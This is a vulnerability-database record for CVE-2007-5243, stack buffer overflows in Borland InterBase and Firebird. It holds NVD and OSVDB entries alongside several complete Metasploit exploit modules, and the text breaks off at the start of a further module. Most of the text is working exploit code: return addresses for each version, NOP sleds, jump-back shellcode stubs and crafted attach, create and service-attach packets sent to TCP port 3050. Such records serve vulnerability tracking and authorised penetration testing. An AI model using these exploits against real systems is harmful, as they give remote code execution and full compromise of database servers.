{"id": "MSF:EXPLOIT/WINDOWS/MISC/IB_ISC_ATTACH_DATABASE", "type": "metasploit", "bulletinFamily": "exploit", "title": "Borland InterBase isc_attach_database() Buffer Overflow", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5243", "http://www.risesecurity.org/advisories/RISE-2007002.txt"], "cvelist": ["CVE-2007-5243"], "lastseen": "2020-10-06T04:59:12", "viewCount": 11, "enchantments": {"score": {"value": 8.3, "vector": "NONE", "modified": "2020-10-06T04:59:12", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5243"]}, {"type": "exploitdb", "idList": ["EDB-ID:9954", "EDB-ID:10020", "EDB-ID:16844", "EDB-ID:16843", "EDB-ID:16420", "EDB-ID:16449", "EDB-ID:16432", "EDB-ID:16437", "EDB-ID:16839", "EDB-ID:16440"]}, {"type": "osvdb", "idList": ["OSVDB:38606", "OSVDB:38608", "OSVDB:38605", "OSVDB:38609", "OSVDB:38607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83097", "PACKETSTORM:82244", "PACKETSTORM:83227", "PACKETSTORM:82246", "PACKETSTORM:83238", "PACKETSTORM:83201", "PACKETSTORM:83069", "PACKETSTORM:83151"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/MISC/IB_ISC_CREATE_DATABASE", "MSF:EXPLOIT/LINUX/MISC/IB_PWD_DB_ALIASED", "MSF:EXPLOIT/WINDOWS/MISC/FB_ISC_ATTACH_DATABASE", "MSF:EXPLOIT/WINDOWS/MISC/FB_ISC_CREATE_DATABASE", "MSF:EXPLOIT/LINUX/MISC/IB_JRD8_CREATE_DATABASE", "MSF:EXPLOIT/WINDOWS/MISC/IB_SVC_ATTACH", "MSF:EXPLOIT/LINUX/MISC/IB_INET_CONNECT", "MSF:EXPLOIT/WINDOWS/MISC/FB_SVC_ATTACH"]}], "modified": "2020-10-06T04:59:12", "rev": 2}, "vulnersScore": 8.3}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/ib_isc_attach_database.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::BruteTargets\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'Borland InterBase isc_attach_database() Buffer Overflow',\n 'Description'\t=> %q{\n This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted attach request.\n },\n 'Author'\t=>\n [\n 'Ramon de C Valle',\n 'Adriano Lima <adriano[at]risesecurity.org>',\n ],\n 'Arch'\t\t=> ARCH_X86,\n 'Platform'\t=> 'win',\n 'References'\t=>\n [\n [ 'CVE', '2007-5243' ],\n [ 'OSVDB', '38607' ],\n [ 'BID', '25917' ],\n [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\n ],\n 'Privileged'\t=> true,\n 'License'\t=> MSF_LICENSE,\n 'Payload'\t=>\n {\n 'Space' => 512,\n 'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\n 'StackAdjustment' => -3500,\n },\n 'Targets'\t=>\n [\n [ 'Brute Force', { } ],\n # 0x00403d4b pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V8.1.0.257',\n { 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403d4b }\n ],\n # 0x00403d4d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V8.0.0.123',\n { 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403d4d }\n ],\n # 0x00403a5d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80',\n { 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403a5d }\n ],\n # 0x004038fd pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V7.0.1.1',\n { 'Length' => [ 3136, 3140 ], 'Ret' => 0x004038fd }\n ],\n # 0x0040390d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V6.5.0.28',\n { 'Length' => [ 1328, 1332 ], 'Ret' => 0x0040390d }\n ],\n # 0x00403901 pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V6.0.1.6',\n { 'Length' => [ 1328, 1332 ], 'Ret' => 0x00403901 }\n ],\n # 0x004038b1 pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0',\n { 'Length' => [ 1328, 1332 ], 'Ret' => 0x004038b1 }\n ],\n # 0x00404a10 pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V5.5.0.742',\n { 'Length' => [ 1428, 1432 ], 'Ret' => 0x00404a10 }\n ],\n # 0x00404a0e pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V5.1.1.680',\n { 'Length' => [ 1332, 1336 ], 'Ret' => 0x00404a0e }\n ],\n # Debug\n [\n 'Debug',\n { 'Length' => [ 1332 ], 'Ret' => 0xaabbccdd }\n ],\n ],\n 'DefaultTarget'\t=> 0,\n 'DisclosureDate' => 'Oct 03 2007'\n ))\n\n register_options(\n [\n Opt::RPORT(3050)\n ],\n self.class\n )\n\n end\n\n def exploit_target(target)\n\n target['Length'].each do |length|\n\n connect\n\n # Attach database\n op_attach = 19\n\n remainder = length.remainder(4)\n padding = 0\n\n if remainder > 0\n padding = (4 - remainder)\n end\n\n buf = ''\n\n # Operation/packet type\n buf << [op_attach].pack('N')\n\n # Id\n buf << [0].pack('N')\n\n # Length\n buf << [length].pack('N')\n\n # Nop block\n buf << make_nops(length - payload.encoded.length - 13)\n\n # Payload\n buf << payload.encoded\n\n # Jump back into the nop block\n buf << \"\\xe9\" + [-1028].pack('V')\n\n # Jump back\n buf << \"\\xeb\" + [-7].pack('c')\n\n # Random alpha data\n buf << rand_text_alpha(2)\n\n # Target\n buf << [target.ret].pack('V')\n\n # Padding\n buf << \"\\x00\" * padding\n\n # Database parameter block\n\n # Length\n buf << [1024].pack('N')\n\n # Random alpha data\n buf << rand_text_alpha(1024)\n\n sock.put(buf)\n\n select(nil,nil,nil,4)\n\n handler\n\n end\n\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}

{"cve": [{"lastseen": "2020-10-03T11:45:54", "description": "Multiple stack-based buffer overflows in Borland InterBase LI 8.0.0.53 through 8.1.0.253, and WI 5.1.1.680 through 8.1.0.257, allow remote attackers to execute arbitrary code via (1) a long service attach request on TCP port 3050 to the (a) SVC_attach or (b) INET_connect function, (2) a long create request on TCP port 3050 to the (c) isc_create_database or (d) jrd8_create_database function, (3) a long attach request on TCP port 3050 to the (e) isc_attach_database or (f) PWD_db_aliased function, or unspecified vectors involving the (4) jrd8_attach_database or (5) expand_filename2 function.\nMore information about this vulnerability can be found at: \r\nhttp://www.securitytracker.com/alerts/2007/Oct/1018772.html", "edition": 3, "cvss3": {}, "published": "2007-10-06T17:17:00", "title": "CVE-2007-5243", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-5243"], "modified": "2017-07-29T01:33:00", "cpe": ["cpe:/a:borland_software:interbase:li_8.0.0.253", "cpe:/a:borland_software:interbase:wi-o6.0.2.0", "cpe:/a:borland_software:interbase:wi_8.1.0.257", "cpe:/a:borland_software:interbase:wi-v7.5.0.129", "cpe:/a:borland_software:interbase:wi-v6.0.1.0", "cpe:/a:borland_software:interbase:li_8.0.0.54", "cpe:/a:borland_software:interbase:wi-v6.0.1.6", "cpe:/a:borland_software:interbase:wi-v8.0.0.123", "cpe:/a:borland_software:interbase:li_8.0.0.53", "cpe:/a:borland_software:interbase:wi_5.1.1.680", "cpe:/a:borland_software:interbase:wi-v5.1.1.680", "cpe:/a:borland_software:interbase:wi-v7.5.1.80", "cpe:/a:borland_software:interbase:wi-o6.0.1.6", "cpe:/a:borland_software:interbase:wi-v5.5.0.742", "cpe:/a:borland_software:interbase:wi-v6.0.0.627", "cpe:/a:borland_software:interbase:wi-v6.5.0.28", "cpe:/a:borland_software:interbase:wi-v7.0.1.1"], "id": "CVE-2007-5243", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5243", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:borland_software:interbase:wi-v6.0.0.627:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v6.5.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-o6.0.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi_5.1.1.680:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v6.0.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v5.5.0.742:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:li_8.0.0.53:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v7.5.1.80:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:li_8.0.0.54:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:li_8.0.0.253:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v8.0.0.123:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi_8.1.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v7.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v6.0.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v5.1.1.680:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-o6.0.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v7.5.0.129:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-5243"], "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018772\n[Secunia Advisory ID:27058](https://secuniaresearch.flexerasoftware.com/advisories/27058/)\n[Related OSVDB ID: 38608](https://vulners.com/osvdb/OSVDB:38608)\n[Related OSVDB ID: 38605](https://vulners.com/osvdb/OSVDB:38605)\n[Related OSVDB ID: 38610](https://vulners.com/osvdb/OSVDB:38610)\n[Related OSVDB ID: 38607](https://vulners.com/osvdb/OSVDB:38607)\n[Related OSVDB ID: 38609](https://vulners.com/osvdb/OSVDB:38609)\nOther Advisory URL: http://risesecurity.org/blog/entry/3/\nOther Advisory URL: http://risesecurity.org/advisory/RISE-2007002/\nKeyword: TCP port 3050\nISS X-Force ID: 36956\nGeneric Exploit URL: http://risesecurity.org/exploit/14/\nFrSIRT Advisory: ADV-2007-3381\n[CVE-2007-5243](https://vulners.com/cve/CVE-2007-5243)\nBugtraq ID: 25917\n", "edition": 1, "modified": "2007-10-03T18:28:59", "published": "2007-10-03T18:28:59", "href": "https://vulners.com/osvdb/OSVDB:38606", "id": "OSVDB:38606", "title": "Borland InterBase Multiple Function create Request Remote Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-5243"], "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018772\n[Secunia Advisory ID:27058](https://secuniaresearch.flexerasoftware.com/advisories/27058/)\n[Related OSVDB ID: 38605](https://vulners.com/osvdb/OSVDB:38605)\n[Related OSVDB ID: 38610](https://vulners.com/osvdb/OSVDB:38610)\n[Related OSVDB ID: 38606](https://vulners.com/osvdb/OSVDB:38606)\n[Related OSVDB ID: 38607](https://vulners.com/osvdb/OSVDB:38607)\n[Related OSVDB ID: 38609](https://vulners.com/osvdb/OSVDB:38609)\nOther Advisory URL: http://risesecurity.org/blog/entry/3/\nOther Advisory URL: http://risesecurity.org/advisory/RISE-2007002/\nKeyword: TCP port 3050\nISS X-Force ID: 36956\nGeneric Exploit URL: http://risesecurity.org/exploit/10/\nFrSIRT Advisory: ADV-2007-3381\n[CVE-2007-5243](https://vulners.com/cve/CVE-2007-5243)\nBugtraq ID: 25917\n", "edition": 1, "modified": "2007-10-03T18:28:59", "published": "2007-10-03T18:28:59", "href": "https://vulners.com/osvdb/OSVDB:38608", "id": "OSVDB:38608", "title": "Borland InterBase jrd8_attach_database Function Unspecified Remote Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-5243"], "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018772\n[Secunia Advisory ID:27058](https://secuniaresearch.flexerasoftware.com/advisories/27058/)\n[Related OSVDB ID: 38608](https://vulners.com/osvdb/OSVDB:38608)\n[Related OSVDB ID: 38610](https://vulners.com/osvdb/OSVDB:38610)\n[Related OSVDB ID: 38606](https://vulners.com/osvdb/OSVDB:38606)\n[Related OSVDB ID: 38607](https://vulners.com/osvdb/OSVDB:38607)\n[Related OSVDB ID: 38609](https://vulners.com/osvdb/OSVDB:38609)\nOther Advisory URL: http://risesecurity.org/blog/entry/3/\nOther Advisory URL: http://risesecurity.org/advisory/RISE-2007002/\nKeyword: TCP port 3050\nISS X-Force ID: 36956\nGeneric Exploit URL: http://risesecurity.org/exploit/15/\nGeneric Exploit URL: http://risesecurity.org/exploit/9/\nFrSIRT Advisory: ADV-2007-3381\n[CVE-2007-5243](https://vulners.com/cve/CVE-2007-5243)\nBugtraq ID: 25917\n", "edition": 1, "modified": "2007-10-03T18:28:59", "published": "2007-10-03T18:28:59", "href": "https://vulners.com/osvdb/OSVDB:38605", "id": "OSVDB:38605", "title": "Borland InterBase Multiple Function service attach Request Remote Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-5243"], "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018772\n[Secunia Advisory ID:27058](https://secuniaresearch.flexerasoftware.com/advisories/27058/)\n[Related OSVDB ID: 38608](https://vulners.com/osvdb/OSVDB:38608)\n[Related OSVDB ID: 38605](https://vulners.com/osvdb/OSVDB:38605)\n[Related OSVDB ID: 38610](https://vulners.com/osvdb/OSVDB:38610)\n[Related OSVDB ID: 38606](https://vulners.com/osvdb/OSVDB:38606)\n[Related OSVDB ID: 38607](https://vulners.com/osvdb/OSVDB:38607)\nOther Advisory URL: http://risesecurity.org/blog/entry/3/\nOther Advisory URL: http://risesecurity.org/advisory/RISE-2007002/\nKeyword: TCP port 3050\nISS X-Force ID: 36956\nFrSIRT Advisory: ADV-2007-3381\n[CVE-2007-5243](https://vulners.com/cve/CVE-2007-5243)\nBugtraq ID: 25917\n", "edition": 1, "modified": "2007-10-03T18:28:59", "published": "2007-10-03T18:28:59", "href": "https://vulners.com/osvdb/OSVDB:38609", "id": "OSVDB:38609", "title": "Borland InterBase expand_filename2 Function Unspecified Remote Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-5243"], "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018772\n[Secunia Advisory ID:27058](https://secuniaresearch.flexerasoftware.com/advisories/27058/)\n[Related OSVDB ID: 38608](https://vulners.com/osvdb/OSVDB:38608)\n[Related OSVDB ID: 38605](https://vulners.com/osvdb/OSVDB:38605)\n[Related OSVDB ID: 38610](https://vulners.com/osvdb/OSVDB:38610)\n[Related OSVDB ID: 38606](https://vulners.com/osvdb/OSVDB:38606)\n[Related OSVDB ID: 38609](https://vulners.com/osvdb/OSVDB:38609)\nOther Advisory URL: http://risesecurity.org/blog/entry/3/\nOther Advisory URL: http://risesecurity.org/advisory/RISE-2007002/\nKeyword: TCP port 3050\nISS X-Force ID: 36956\nGeneric Exploit URL: http://risesecurity.org/exploit/12/\nGeneric Exploit URL: http://risesecurity.org/exploit/13/\nFrSIRT Advisory: ADV-2007-3381\n[CVE-2007-5243](https://vulners.com/cve/CVE-2007-5243)\nBugtraq ID: 25917\n", "edition": 1, "modified": "2007-10-03T18:28:59", "published": "2007-10-03T18:28:59", "href": "https://vulners.com/osvdb/OSVDB:38607", "id": "OSVDB:38607", "title": "Borland InterBase Multiple Function attach Request Remote Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:50", "description": "", "published": "2009-10-27T00:00:00", "type": "packetstorm", "title": "Borland InterBase jrd8_create_database() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2009-10-27T00:00:00", "id": "PACKETSTORM:82244", "href": "https://packetstormsecurity.com/files/82244/Borland-InterBase-jrd8_create_database-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Borland InterBase jrd8_create_database() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Borland InterBase \nby sending a specially crafted create request. \n}, \n'Version' => '$Revision$', \n'Author' => \n[ \n'ramon', \n'Adriano Lima <adriano@risesecurity.org>', \n], \n'Arch' => ARCH_X86, \n'Platform' => 'linux', \n'References' => \n[ \n[ 'CVE', '2007-5243' ], \n[ 'OSVDB', '38606' ], \n[ 'BID', '25917' ], \n[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], \n], \n'Privileged' => true, \n'License' => MSF_LICENSE, \n'Payload' => \n{ \n'Space' => 128, \n'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\", \n}, \n'Targets' => \n[ \n# 0x0804cbe4 pop esi; pop ebp; ret \n[ \n'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253', \n{ 'Ret' => 0x0804cbe4 } \n], \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOpt::RPORT(3050) \n], \nself.class \n) \n \nend \n \ndef exploit \n \nconnect \n \n# Create database \nop_create = 20 \n \nlength = 544 \nremainder = length.remainder(4) \npadding = 0 \n \nif remainder > 0 \npadding = (4 - remainder) \nend \n \nbuf = '' \n \n# Operation/packet type \nbuf << [op_create].pack('N') \n \n# Id \nbuf << [0].pack('N') \n \n# Length \nbuf << [length].pack('N') \n \n# It will return into this nop block \nbuf << make_nops(length - payload.encoded.length - 4) \n \n# Payload \nbuf << payload.encoded \n \n# Target \nbuf << [target.ret].pack('V') \n \n# Padding \nbuf << \"\\x00\" * padding \n \n# Database parameter block \n \n# Length \nbuf << [1024 * 32].pack('N') \n \n# Random alpha data \nbuf << rand_text_alpha(1024 * 32) \n \nsock.put(buf) \n \nhandler \n \nend \n \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82244/ib_jrd8_create_database.rb.txt"}, {"lastseen": "2016-12-05T22:19:45", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Borland InterBase isc_create_database() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83069", "href": "https://packetstormsecurity.com/files/83069/Borland-InterBase-isc_create_database-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::BruteTargets \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Borland InterBase isc_create_database() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Borland InterBase \nby sending a specially crafted create request. \n}, \n'Version' => '$Revision$', \n'Author' => \n[ \n'ramon', \n'Adriano Lima <adriano@risesecurity.org>', \n], \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'References' => \n[ \n[ 'CVE', '2007-5243' ], \n[ 'OSVDB', '38606' ], \n[ 'BID', '25917' ], \n[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], \n], \n'Privileged' => true, \n'License' => MSF_LICENSE, \n'Payload' => \n{ \n'Space' => 512, \n'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ 'Brute Force', { } ], \n# 0x00403d4b pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V8.1.0.257', \n{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403d4b } \n], \n# 0x00403d4d pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V8.0.0.123', \n{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403d4d } \n], \n# 0x00403a5d pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80', \n{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403a5d } \n], \n# 0x004038fd pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V7.0.1.1', \n{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x004038fd } \n], \n# 0x0040390d pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V6.5.0.28', \n{ 'Length' => [ 1332, 1336 ], 'Ret' => 0x0040390d } \n], \n# 0x00403901 pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V6.0.1.6', \n{ 'Length' => [ 1332, 1336 ], 'Ret' => 0x00403901 } \n], \n# 0x004038b1 pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0', \n{ 'Length' => [ 1332, 1336 ], 'Ret' => 0x004038b1 } \n], \n# 0x00404a10 pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V5.5.0.742', \n{ 'Length' => [ 1432, 1436 ], 'Ret' => 0x00404a10 } \n], \n# 0x00404a0e pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V5.1.1.680', \n{ 'Length' => [ 1336, 1340 ], 'Ret' => 0x00404a0e } \n], \n# Debug \n[ \n'Debug', \n{ 'Length' => [ 1336 ], 'Ret' => 0xaabbccdd } \n], \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOpt::RPORT(3050) \n], \nself.class \n) \n \nend \n \ndef exploit_target(target) \n \ntarget['Length'].each do |length| \n \nconnect \n \n# Create database \nop_create = 20 \n \nremainder = length.remainder(4) \npadding = 0 \n \nif remainder > 0 \npadding = (4 - remainder) \nend \n \nbuf = '' \n \n# Operation/packet type \nbuf << [op_create].pack('N') \n \n# Id \nbuf << [0].pack('N') \n \n# Length \nbuf << [length].pack('N') \n \n# Nop block \nbuf << make_nops(length - payload.encoded.length - 13) \n \n# Payload \nbuf << payload.encoded \n \n# Jump back into the nop block \nbuf << \"\\xe9\" + [-1028].pack('V') \n \n# Jump back \nbuf << \"\\xeb\" + [-7].pack('c') \n \n# Random alpha data \nbuf << rand_text_alpha(2) \n \n# Target \nbuf << [target.ret].pack('V') \n \n# Padding \nbuf << \"\\x00\" * padding \n \n# Database parameter block \n \n# Length \nbuf << [1024].pack('N') \n \n# Random alpha data \nbuf << rand_text_alpha(1024) \n \nsock.put(buf) \n \nsleep(4) \n \nhandler \n \nend \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83069/ib_isc_create_database.rb.txt"}, {"lastseen": "2016-12-05T22:22:31", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Firebird Relational Database SVC_attach() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83097", "href": "https://packetstormsecurity.com/files/83097/Firebird-Relational-Database-SVC_attach-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::BruteTargets \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Firebird Relational Database SVC_attach() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Borland InterBase \nby sending a specially crafted service attach request. \n}, \n'Version' => '$Revision$', \n'Author' => \n[ \n'ramon', \n'Adriano Lima <adriano@risesecurity.org>', \n], \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'References' => \n[ \n[ 'CVE', '2007-5243' ], \n[ 'OSVDB', '38605' ], \n[ 'BID', '25917' ], \n[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], \n], \n'Privileged' => true, \n'License' => MSF_LICENSE, \n'Payload' => \n{ \n'Space' => 256, \n'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ 'Brute Force', { } ], \n# 0x0040230b pop ebp; pop ebx; ret \n[ \n'Firebird WI-V1.5.3.4870 WI-V1.5.4.4910', \n{ 'Length' => [ 308 ], 'Ret' => 0x0040230b } \n], \n# Debug \n[ \n'Debug', \n{ 'Length' => [ 308 ], 'Ret' => 0xaabbccdd } \n], \n], \n'DefaultTarget' => 1 \n)) \n \nregister_options( \n[ \nOpt::RPORT(3050) \n], \nself.class \n) \n \nend \n \ndef exploit_target(target) \n \ntarget['Length'].each do |length| \n \nconnect \n \n# Attach database \nop_attach = 19 \n \n# Create database \nop_create = 20 \n \n# Service attach \nop_service_attach = 82 \n \nremainder = length.remainder(4) \npadding = 0 \n \nif remainder > 0 \npadding = (4 - remainder) \nend \n \nbuf = '' \n \n# Operation/packet type \nbuf << [op_service_attach].pack('N') \n \n# Id \nbuf << [0].pack('N') \n \n# Length \nbuf << [length].pack('N') \n \n# Nop block \nbuf << make_nops(length - payload.encoded.length - 13) \n \n# Payload \nbuf << payload.encoded \n \n# Jump back into the nop block \nbuf << \"\\xe9\" + [-260].pack('V') \n \n# Jump back \nbuf << \"\\xeb\" + [-7].pack('c') \n \n# Random alpha data \nbuf << rand_text_alpha(2) \n \n# Target \nbuf << [target.ret].pack('V') \n \n# Padding \nbuf << \"\\x00\" * padding \n \n# Database parameter block \n \n# Length \nbuf << [1024].pack('N') \n \n# Random alpha data \nbuf << rand_text_alpha(1024) \n \nsock.put(buf) \n \n#sleep(4) \n \nhandler \n \nend \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83097/fb_svc_attach.rb.txt"}, {"lastseen": "2016-12-05T22:11:37", "description": "", "published": "2009-10-27T00:00:00", "type": "packetstorm", "title": "Borland InterBase PWD_db_aliased() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2009-10-27T00:00:00", "id": "PACKETSTORM:82246", "href": "https://packetstormsecurity.com/files/82246/Borland-InterBase-PWD_db_aliased-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n 